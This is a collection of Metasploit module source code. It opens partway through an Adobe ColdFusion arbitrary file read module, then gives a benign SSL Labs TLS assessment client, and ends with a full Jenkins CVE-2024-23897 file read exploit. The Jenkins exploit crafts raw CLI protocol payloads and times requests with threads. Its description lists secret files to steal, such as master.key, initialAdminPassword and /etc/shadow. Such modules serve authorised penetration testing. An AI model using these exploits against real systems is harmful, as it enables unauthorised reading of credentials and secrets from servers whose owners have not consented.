folder.', '../lib/neo-security.xml']), OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/CFIDE/wizards/common/utils.cfc']), OptString.new('CFC_METHOD', [true, 'The target ColdFusion Component (CFC) remote method name', 'wizardHash']), OptString.new('CFC_METHOD_PARAMETERS', [false, 'Additional target ColdFusion Component (CFC) remote method parameters to supply via a GET request (e.g. "param1=foo, param2=hello world")', 'inPassword=foo']) ] ) end def run unless datastore['CFC_ENDPOINT'].end_with? '.cfc' fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file') end if datastore['TARGETFILE'].empty? || datastore['TARGETFILE'].end_with?('.cfc', '.cfm') fail_with(Failure::BadConfig, 'The TARGETFILE must not point to a .cfc or .cfm file') end # The relative path from wwwroot to the TARGETFILE. target_file = datastore['TARGETFILE'] # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name. if target_file.include? '\\' classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{target_file}" else classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{target_file}" end json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}" vars_get = { 'method' => datastore['CFC_METHOD'], '_cfclient' => 'true', 'returnFormat' => 'wddx' } # If the CFC_METHOD required parameters, extract them from CFC_METHOD_PARAMETERS and add to the vars_get Hash. unless datastore['CFC_METHOD_PARAMETERS'].blank? datastore['CFC_METHOD_PARAMETERS'].split(',').each do |pair| param_name, param_value = pair.split('=', 2) # remove the leading/trailing whitespace so user can pass something like "p1=foo, p2 = bar , p3 = hello world, p4" vars_get[param_name.strip] = param_value&.strip end end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['CFC_ENDPOINT']), 'vars_get' => vars_get, 'vars_post' => { '_variables' => json_variables } ) file_data = nil # The TARGETFILE contents will be emitted after the WDDX result of the remote CFC_METHOD. A _cfclient call # will always return a struct with a 'variables' key via ComponentFilter.invoke and by selecting a returnFormat of # wddx, we know to have a closing wddxPacket to search for. So we search for the TARGETFILE contents after # the closing wddxPacket tag in the response body. wddx_packet_tag = '</wddxPacket>' if res && res.code == 200 && (res.body.include? wddx_packet_tag) file_data = res.body[res.body.index(wddx_packet_tag) + wddx_packet_tag.length..] # If the default CFC options were used, we know the output will end with the result of calling wizardHash. So we can # remove the result which is a SHA1 hash and two 32 byte random strings, comma separated and a trailing space. if datastore['CFC_ENDPOINT'] == '/CFIDE/wizards/common/utils.cfc' && datastore['CFC_METHOD'] == 'wizardHash' file_data = file_data[0..file_data.length - (40 + 32 + 32 + 2 + 1) - 1] end else # ColdFusion has a non-default option 'Enable Request Debugging Output', which if enabled may return a HTTP 500 # or 404 error, while also including the arbitrary file read output. We detect this here and retrieve the file # output which is prepended to the error page. request_debugging_tag = '</TD></TD></TD></TH></TH></TH>' if res && (res.code == 404 || res.code == 500) && (res.body.include? request_debugging_tag) file_data = res.body[0, res.body.index(request_debugging_tag)] end end if file_data.blank? fail_with(Failure::UnexpectedReply, 'Failed to read the file. Ensure both the CFC_ENDPOINT, CFC_METHOD and CFC_METHOD_PARAMETERS are set correctly and that the endpoint is accessible.') end if datastore['STORE_LOOT'] == true print_status('Storing the file data to loot...') store_loot(File.basename(target_file), 'text/plain', datastore['RHOST'], file_data, datastore['TARGETFILE'], 'File read from Adobe ColdFusion server') else print_status(file_data.to_s) end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' class MetasploitModule < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end class ServiceNotAvailable < StandardError; end class ServiceOverloaded < StandardError; end class Api attr_reader :max_assessments, :current_assessments def initialize @max_assessments = 0 @current_assessments = 0 end def request(name, params = {}) api_host = "api.ssllabs.com" api_port = "443" api_path = "/api/v2/" user_agent = "Msf_ssllabs_scan" name = name.to_s.camelize(:lower) uri = api_path + name cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, 'agent' => user_agent, 'method' => 'GET', 'vars_get' => params }) res = cli.send_recv(req) cli.close if res && res.code.to_i == 200 @max_assessments = res.headers['X-Max-Assessments'] @current_assessments = res.headers['X-Current-Assessments'] r = JSON.load(res.body) fail InvocationError, "API returned: #{r['errors']}" if r.key?('errors') return r end case res.code.to_i when 400 fail InvocationError when 429 fail RequestRateTooHigh when 500 fail InternalError when 503 fail ServiceNotAvailable when 529 fail ServiceOverloaded else fail StandardError, "HTTP error code #{r.code}", caller end end def report_unused_attrs(type, unused_attrs) unused_attrs.each do | attr | # $stderr.puts "#{type} request returned unknown parameter #{attr}" end end def info obj, unused_attrs = Info.load request(:info) report_unused_attrs('info', unused_attrs) obj end def analyse(params = {}) obj, unused_attrs = Host.load request(:analyze, params) report_unused_attrs('analyze', unused_attrs) obj end def get_endpoint_data(params = {}) obj, unused_attrs = Endpoint.load request(:get_endpoint_data, params) report_unused_attrs('get_endpoint_data', unused_attrs) obj end def get_status_codes obj, unused_attrs = StatusCodes.load request(:get_status_codes) report_unused_attrs('get_status_codes', unused_attrs) obj end end class ApiObject class << self; attr_accessor :all_attributes attr_accessor :fields attr_accessor :lists attr_accessor :refs end def self.inherited(base) base.all_attributes = [] base.fields = [] base.lists = {} base.refs = {} end def self.to_api_name(name) name.to_s.gsub(/\?$/, '').camelize(:lower) end def self.to_attr_name(name) name.to_s.gsub(/\?$/, '').underscore end def self.field_methods(name) is_bool = name.to_s.end_with?('?') attr_name = to_attr_name(name) api_name = to_api_name(name) class_eval <<-EOF, __FILE__, __LINE__ def #{attr_name}#{'?' if is_bool} @#{api_name} end def #{attr_name}=(value) @#{api_name} = value end EOF end def self.has_fields(*names) names.each do |name| @all_attributes << to_api_name(name) @fields << to_api_name(name) field_methods(name) end end def self.has_objects_list(name, klass) @all_attributes << to_api_name(name) @lists[to_api_name(name)] = klass field_methods(name) end def self.has_object_ref(name, klass) @all_attributes << to_api_name(name) @refs[to_api_name(name)] = klass field_methods(name) end def self.load(attributes = {}) obj = self.new unused_attrs = [] attributes.each do |name, value| if @fields.include?(name) obj.instance_variable_set("@#{name}", value) elsif @lists.key?(name) unless value.nil? var = value.map do |v| val, ua = @lists[name].load(v) unused_attrs.concat ua val end obj.instance_variable_set("@#{name}", var) end elsif @refs.key?(name) unless value.nil? val, ua = @refs[name].load(value) unused_attrs.concat ua obj.instance_variable_set("@#{name}", val) end else unused_attrs << name end end return obj, unused_attrs end def to_json(opts = {}) obj = {} self.class.all_attributes.each do |api_name| v = instance_variable_get("@#{api_name}") obj[api_name] = v end obj.to_json end end class Cert < ApiObject has_fields :subject, :commonNames, :altNames, :notBefore, :notAfter, :issuerSubject, :sigAlg, :issuerLabel, :revocationInfo, :crlURIs, :ocspURIs, :revocationStatus, :crlRevocationStatus, :ocspRevocationStatus, :sgc?, :validationType, :issues, :sct?, :mustStaple, :sha1Hash, :pinSha256 def valid? issues == 0 end def invalid? !valid? end end class ChainCert < ApiObject has_fields :subject, :label, :notBefore, :notAfter, :issuerSubject, :issuerLabel, :sigAlg, :issues, :keyAlg, :keySize, :keyStrength, :revocationStatus, :crlRevocationStatus, :ocspRevocationStatus, :raw, :sha1Hash, :pinSha256 def valid? issues == 0 end def invalid? !valid? end end class Chain < ApiObject has_objects_list :certs, ChainCert has_fields :issues def valid? issues == 0 end def invalid? !valid? end end class Key < ApiObject has_fields :size, :strength, :alg, :debianFlaw?, :q def insecure? debian_flaw? || q == 0 end def secure? !insecure? end end class Protocol < ApiObject has_fields :id, :name, :version, :v2SuitesDisabled?, :q def insecure? q == 0 end def secure? !insecure? end end class Info < ApiObject has_fields :engineVersion, :criteriaVersion, :clientMaxAssessments, :maxAssessments, :currentAssessments, :messages, :newAssessmentCoolOff end class SimClient < ApiObject has_fields :id, :name, :platform, :version, :isReference? end class Simulation < ApiObject has_object_ref :client, SimClient has_fields :errorCode, :attempts, :protocolId, :suiteId, :kxInfo def success? error_code == 0 end def error? !success? end end class SimDetails < ApiObject has_objects_list :results, Simulation end class StatusCodes < ApiObject has_fields :statusDetails def [](name) status_details[name] end end class Suite < ApiObject has_fields :id, :name, :cipherStrength, :dhStrength, :dhP, :dhG, :dhYs, :ecdhBits, :ecdhStrength, :q def insecure? q == 0 end def secure? !insecure? end end class Suites < ApiObject has_objects_list :list, Suite has_fields :preference? end class EndpointDetails < ApiObject has_fields :hostStartTime has_object_ref :key, Key has_object_ref :cert, Cert has_object_ref :chain, Chain has_objects_list :protocols, Protocol has_object_ref :suites, Suites has_fields :serverSignature, :prefixDelegation?, :nonPrefixDelegation?, :vulnBeast?, :renegSupport, :stsResponseHeader, :stsMaxAge, :stsSubdomains?, :pkpResponseHeader, :sessionResumption, :compressionMethods, :supportsNpn?, :npnProtocols, :sessionTickets, :ocspStapling?, :staplingRevocationStatus, :staplingRevocationErrorMessage, :sniRequired?, :httpStatusCode, :httpForwarding, :supportsRc4?, :forwardSecrecy, :rc4WithModern? has_object_ref :sims, SimDetails has_fields :heartbleed?, :heartbeat?, :openSslCcs, :poodle?, :poodleTls, :fallbackScsv?, :freak?, :hasSct, :stsStatus, :stsPreload, :supportsAlpn, :rc4Only, :protocolIntolerance, :miscIntolerance, :openSSLLuckyMinus20, :logjam, :chaCha20Preference, :hstsPolicy, :hstsPreloads, :hpkpPolicy, :hpkpRoPolicy, :drownHosts, :drownErrors, :drownVulnerable end class Endpoint < ApiObject has_fields :ipAddress, :serverName, :statusMessage, :statusDetails, :statusDetailsMessage, :grade, :gradeTrustIgnored, :hasWarnings?, :isExceptional?, :progress, :duration, :eta, :delegation has_object_ref :details, EndpointDetails end class Host < ApiObject has_fields :host, :port, :protocol, :isPublic?, :status, :statusMessage, :startTime, :testTime, :engineVersion, :criteriaVersion, :cacheExpiryTime has_objects_list :endpoints, Endpoint has_fields :certHostnames end def initialize(info = {}) super(update_info(info, 'Name' => 'SSL Labs API Client', 'Description' => %q{ This module is a simple client for the SSL Labs APIs, designed for SSL/TLS assessment during a penetration test. }, 'License' => MSF_LICENSE, 'Author' => [ 'Denis Kolegov <dnkolegov[at]gmail.com>', 'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb) ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, } )) register_options( [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ]) end def report_good(line) print_good line end def report_warning(line) print_warning line end def report_bad(line) print_warning line end def report_status(line) print_status line end def output_endpoint_data(r) ssl_protocols = [ { id: 771, name: "TLS", version: "1.2", secure: true, active: false }, { id: 770, name: "TLS", version: "1.1", secure: true, active: false }, { id: 769, name: "TLS", version: "1.0", secure: true, active: false }, { id: 768, name: "SSL", version: "3.0", secure: false, active: false }, { id: 2, name: "SSL", version: "2.0", secure: false, active: false } ] report_status "-----------------------------------------------------------------" report_status "Report for #{r.server_name} (#{r.ip_address})" report_status "-----------------------------------------------------------------" case r.grade.to_s when "A+", "A", "A-" report_good "Overall rating: #{r.grade}" when "B" report_warning "Overall rating: #{r.grade}" when "C", "D", "E", "F" report_bad "Overall rating: #{r.grade}" when "M" report_bad "Overall rating: #{r.grade} - Certificate name mismatch" when "T" report_bad "Overall rating: #{r.grade} - Server's certificate is not trusted" end report_warning "Grade is #{r.grade_trust_ignored}, if trust issues are ignored)" if r.grade.to_s != r.grade_trust_ignored.to_s # Supported protocols r.details.protocols.each do |i| p = ssl_protocols.detect { |x| x[:id] == i.id } p.store(:active, true) if p end ssl_protocols.each do |proto| if proto[:active] if proto[:secure] report_good "#{proto[:name]} #{proto[:version]} - Yes" else report_bad "#{proto[:name]} #{proto[:version]} - Yes" end else report_good "#{proto[:name]} #{proto[:version]} - No" end end # Renegotiation case when r.details.reneg_support == 0 report_warning "Secure renegotiation is not supported" when r.details.reneg_support[0] == 1 report_bad "Insecure client-initiated renegotiation is supported" when r.details.reneg_support[1] == 1 report_good "Secure renegotiation is supported" when r.details.reneg_support[2] == 1 report_warning "Secure client-initiated renegotiation is supported" when r.details.reneg_support[3] == 1 report_warning "Server requires secure renegotiation support" end # BEAST if r.details.vuln_beast? report_bad "BEAST attack - Yes" else report_good "BEAST attack - No" end # POODLE (SSLv3) if r.details.poodle? report_bad "POODLE SSLv3 - Vulnerable" else report_good "POODLE SSLv3 - Not vulnerable" end # POODLE TLS case r.details.poodle_tls when -1 report_warning "POODLE TLS - Test failed" when 0 report_warning "POODLE TLS - Unknown" when 1 report_good "POODLE TLS - Not vulnerable" when 2 report_bad "POODLE TLS - Vulnerable" end # Downgrade attack prevention if r.details.fallback_scsv? report_good "Downgrade attack prevention - Yes, TLS_FALLBACK_SCSV supported" else report_bad "Downgrade attack prevention - No, TLS_FALLBACK_SCSV not supported" end # Freak if r.details.freak? report_bad "Freak - Vulnerable" else report_good "Freak - Not vulnerable" end # RC4 if r.details.supports_rc4? report_warning "RC4 - Server supports at least one RC4 suite" else report_good "RC4 - No" end # RC4 with modern browsers report_warning "RC4 is used with modern clients" if r.details.rc4_with_modern? # Heartbeat if r.details.heartbeat? report_status "Heartbeat (extension) - Yes" else report_status "Heartbeat (extension) - No" end # Heartbleed if r.details.heartbleed? report_bad "Heartbleed (vulnerability) - Yes" else report_good "Heartbleed (vulnerability) - No" end # OpenSSL CCS case r.details.open_ssl_ccs when -1 report_warning "OpenSSL CCS vulnerability (CVE-2014-0224) - Test failed" when 0 report_warning "OpenSSL CCS vulnerability (CVE-2014-0224) - Unknown" when 1 report_good "OpenSSL CCS vulnerability (CVE-2014-0224) - No" when 2 report_bad "OpenSSL CCS vulnerability (CVE-2014-0224) - Possibly vulnerable, but not exploitable" when 3 report_bad "OpenSSL CCS vulnerability (CVE-2014-0224) - Vulnerable and exploitable" end # Forward Secrecy case when r.details.forward_secrecy == 0 report_bad "Forward Secrecy - No" when r.details.forward_secrecy[0] == 1 report_bad "Forward Secrecy - With some browsers" when r.details.forward_secrecy[1] == 1 report_good "Forward Secrecy - With modern browsers" when r.details.forward_secrecy[2] == 1 report_good "Forward Secrecy - Yes (with most browsers)" end # HSTS if r.details.sts_response_header str = "Strict Transport Security (HSTS) - Yes" if r.details.sts_max_age && r.details.sts_max_age != -1 str += ":max-age=#{r.details.sts_max_age}" end str += ":includeSubdomains" if r.details.sts_subdomains? report_good str else report_bad "Strict Transport Security (HSTS) - No" end # HPKP if r.details.pkp_response_header report_good "Public Key Pinning (HPKP) - Yes" else report_warning "Public Key Pinning (HPKP) - No" end # Compression if r.details.compression_methods == 0 report_good "Compression - No" elsif (r.details.session_tickets & 1) != 0 report_warning "Compression - Yes (Deflate)" end # Session Resumption case r.details.session_resumption when 0 print_status "Session resumption - No" when 1 report_warning "Session resumption - No (IDs assigned but not accepted)" when 2 print_status "Session resumption - Yes" end # Session Tickets case when r.details.session_tickets == 0 print_status "Session tickets - No" when r.details.session_tickets[0] == 1 print_status "Session tickets - Yes" when r.details.session_tickets[1] == 1 report_good "Session tickets - Implementation is faulty" when r.details.session_tickets[2] == 1 report_warning "Session tickets - Server is intolerant to the extension" end # OCSP stapling if r.details.ocsp_stapling? print_status "OCSP Stapling - Yes" else print_status "OCSP Stapling - No" end # NPN if r.details.supports_npn? print_status "Next Protocol Negotiation (NPN) - Yes (#{r.details.npn_protocols})" else print_status "Next Protocol Negotiation (NPN) - No" end # SNI print_status "SNI Required - Yes" if r.details.sni_required? end def output_grades_only(r) r.endpoints.each do |e| if e.status_message == "Ready" print_status "Server: #{e.server_name} (#{e.ip_address}) - Grade:#{e.grade}" else print_status "Server: #{e.server_name} (#{e.ip_address} - Status:#{e.status_message}" end end end def output_common_info(r) return unless r print_status "Host: #{r.host}" r.endpoints.each do |e| print_status "\t #{e.ip_address}" end end def output_result(r, grade) return unless r output_common_info(r) if grade output_grades_only(r) else r.endpoints.each do |e| if e.status_message == "Ready" output_endpoint_data(e) else print_status "#{e.status_message}" end end end end def output_testing_details(r) return unless r.status == "IN_PROGRESS" if r.endpoints.length == 1 print_status "#{r.host} (#{r.endpoints[0].ip_address}) - Progress #{[r.endpoints[0].progress, 0].max}% (#{r.endpoints[0].status_details_message})" elsif r.endpoints.length > 1 in_progress_srv_num = 0 ready_srv_num = 0 pending_srv_num = 0 r.endpoints.each do |e| case e.status_message.to_s when "In progress" in_progress_srv_num += 1 print_status "Scanned host: #{e.ip_address} (#{e.server_name})- #{[e.progress, 0].max}% complete (#{e.status_details_message})" when "Pending" pending_srv_num += 1 when "Ready" ready_srv_num += 1 end end progress = ((ready_srv_num.to_f / (pending_srv_num + in_progress_srv_num + ready_srv_num)) * 100.0).round(0) print_status "Ready: #{ready_srv_num}, In progress: #{in_progress_srv_num}, Pending: #{pending_srv_num}" print_status "#{r.host} - Progress #{progress}%" end end def valid_hostname?(hostname) hostname =~ /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/ end def run delay = datastore['DELAY'] hostname = datastore['HOSTNAME'] unless valid_hostname?(hostname) print_status "Invalid hostname" return end usecache = datastore['USECACHE'] grade = datastore['GRADE'] # Use cached results if usecache from_cache = 'on' start_new = 'off' else from_cache = 'off' start_new = 'on' end # Ignore mismatch ignore_mismatch = datastore['IGNOREMISMATCH'] ? 'on' : 'off' api = Api.new info = api.info print_status "SSL Labs API info" print_status "API version: #{info.engine_version}" print_status "Evaluation criteria: #{info.criteria_version}" print_status "Running assessments: #{info.current_assessments} (max #{info.max_assessments})" if api.current_assessments >= api.max_assessments print_status "Too many active assessments" return end if usecache r = api.analyse(host: hostname, fromCache: from_cache, ignoreMismatch: ignore_mismatch, all: 'done') else r = api.analyse(host: hostname, startNew: start_new, ignoreMismatch: ignore_mismatch, all: 'done') end loop do case r.status when "DNS" print_status "Server: #{r.host} - #{r.status_message}" when "IN_PROGRESS" output_testing_details(r) when "READY" output_result(r, grade) return when "ERROR" print_error "#{r.status_message}" return else print_error "Unknown assessment status" return end sleep delay r = api.analyse(host: hostname, all: 'done') end rescue RequestRateTooHigh print_error "Request rate is too high, please slow down" rescue InternalError print_error "Service encountered an error, sleep 5 minutes" rescue ServiceNotAvailable print_error "Service is not available, sleep 15 minutes" rescue ServiceOverloaded print_error "Service is overloaded, sleep 30 minutes" rescue print_error "Invalid parameters" end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Jenkins prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Jenkins cli Ampersand Replacement Arbitrary File Read', 'Description' => %q{ This module utilizes the Jenkins cli protocol to run the `help` command. The cli is accessible with read-only permissions by default, which are all thats required. Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to replace any `@<filename>` with the contents of a file. We are then able to retrieve the error message to read up to the first two lines of a file. Exploitation by hand can be done with the cli, see markdown documents for additional instructions. There are a few exploitation oddities: 1. The injection point for the `help` command requires 2 input arguments. When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument. If a file only contains one line, it will throw an error: `ERROR: You must authenticate to access this Jenkins.` However, we can pad out the content by supplying a first argument. 2. There is a strange timing requirement where the `download` (or first) request must get to the server first, but the `upload` (or second) request must be very close behind it. From testing against the docker image, it was found values between `.01` and `1.9` were viable. Due to the round trip time of the first request and response happening before request 2 would be received, it is necessary to use threading to ensure the requests happen within rapid succession. Files of value: * /var/jenkins_home/secret.key * /var/jenkins_home/secrets/master.key * /var/jenkins_home/secrets/initialAdminPassword * /etc/passwd * /etc/shadow * Project secrets and credentials * Source code, build artifacts }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Yaniv Nizry', # discovery 'binganao', # poc 'h4x0r-dz', # poc 'Vozec' # poc ], 'References' => [ [ 'URL', 'https://www.jenkins.io/security/advisory/2024-01-24/'], [ 'URL', 'https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/'], [ 'URL', 'https://github.com/binganao/CVE-2024-23897'], [ 'URL', 'https://github.com/h4x0r-dz/CVE-2024-23897'], [ 'URL', 'https://github.com/Vozec/CVE-2024-23897'], [ 'CVE', '2024-23897'] ], 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2024-01-24', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ ], 'SideEffects' => [ ] }, 'DefaultOptions' => { 'RPORT' => 8080, 'HttpClientTimeout' => 3 # very quick response, so set this low } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']), OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']), ] ) register_advanced_options( [ OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]), OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']), OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US']) ] ) end def check version = jenkins_version return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.blank? version = Rex::Version.new(version) if version <= Rex::Version.new('2.426.2') || # LTS check (version >= Rex::Version.new('2.427') && version <= Rex::Version.new('2.441')) # non-lts return Exploit::CheckCode::Appears("Found exploitable version: #{version}") end Exploit::CheckCode::Safe("Found non-exploitable version: #{version}") end def request_header "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00" end def request_footer data = [] data << "\x00\x00\x00\x07\x02\x00" data << [datastore['ENCODING'].length].pack('C') # length of encoding string data << datastore['ENCODING'] data << "\x00\x00\x00\x07\x01\x00" data << [datastore['LOCALITY'].length].pack('C') # length of locality string data << datastore['LOCALITY'] data << "\x00\x00\x00\x00\x03" data end def parameter_one # a literal parameter of 1 "\x03\x00\x00\x01\x31\x00\x00\x00" end def data_generator(pad: false) data = [] data << request_header data << parameter_one if pad data << [datastore['FILE_PATH'].length + 3].pack('C').to_s data << "\x00\x00" data << [datastore['FILE_PATH'].length + 1].pack('C').to_s data << "\x40" data << datastore['FILE_PATH'] data << request_footer data.join('') end def upload_request(uuid, multi_line_file: true) # send upload request asking for file # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request # which is required for successful exploitation sleep(datastore['DELAY']) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'cli'), 'method' => 'POST', 'keep_cookies' => true, 'ctype' => 'application/octet-stream', 'headers' => { 'Session' => uuid, 'Side' => 'upload' }, 'vars_get' => { 'remoting' => 'false' }, 'data' => data_generator(pad: multi_line_file) ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to upload request (response code: #{res.code})") unless res.code == 200 # we don't get a response here, so we just need the request to go through and 200 us end def process_result(use_pad) # the output comes back as follows: # ERROR: Too many arguments: <line 2> # java -jar jenkins-cli.jar help # [COMMAND] # Lists all the available commands or a detailed description of single command. # COMMAND : Name of the command (default: <line 1>) # The main thing here is we get the first 2 lines of output from the file. # The 2nd line from the file is returned on line 1 of the output, and line # 1 from the file is returned on the last line of output. If padding was used # then <line 1> will just be a literal 1 file_contents = [] @content_body.split("\n").each do |html_response_line| # filter for the two lines which have output if html_response_line.include? 'ERROR: Too many arguments' file_contents << html_response_line.gsub('ERROR: Too many arguments: ', '').strip elsif html_response_line.include? 'COMMAND : Name of the command (default:' temp = html_response_line.gsub(' COMMAND : Name of the command (default: ', '') temp = temp.chomp(')').strip file_contents.insert(0, temp) end end return if file_contents.empty? # if we padded out, then our first line is 1, so drop that file_contents = file_contents.drop(1) if use_pad == true print_good("#{datastore['FILE_PATH']} file contents retrieved (first line or 2):\n#{file_contents.join("\n")}") stored_path = store_loot('jenkins.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH']) print_good("Results saved to: #{stored_path}") end def download_request(uuid) # send download request res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'cli'), 'method' => 'POST', 'keep_cookies' => true, 'headers' => { 'Session' => uuid, 'Side' => 'download' }, 'vars_get' => { 'remoting' => 'false' } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to download request (response code: #{res.code})") unless res.code == 200 @content_body = res.body end def run uuid = SecureRandom.uuid print_status("Sending requests with UUID: #{uuid}") # Looking over the python PoCs, they all include threading however # the writeup, and PoCs don't mention a timing component. # However, during testing it was found that the two requests need to # hit the server nearly simultaneously, with the 'download' one hitting # first. During testing, even a .1 second slowdown was too much and # the server resulted in a 500 error. So we need to thread these to # execute them fast enough that the server gets both in rapid succession use_pad = false threads = [] threads << framework.threads.spawn('CVE-2024-23897', false) do upload_request(uuid, multi_line_file: use_pad) # try single line file first since we get an error if we have more content to get end threads << framework.threads.spawn('CVE-2024-23897', false) do download_request(uuid) end threads.map do |t| t.join rescue StandardError nil end # we got an error that means we need to pad out our value, so rerun with pad if @content_body && @content_body.include?('ERROR: You must authenticate to access this Jenkins.') print_status('Re-attempting with padding for single line output file') use_pad = true threads = [] threads << framework.threads.spawn('CVE-2024-23897-upload', false) do upload_request(uuid, multi_line_file: use_pad) end threads << framework.threads.spawn('CVE-2024-23897-download', false) do download_request(uuid) end threads.map do |t| t.join rescue StandardError nil end end if @content_body process_result(use_pad) else print_bad('Exploit failed, no exploit data was successfully returned') end end end </code></pre>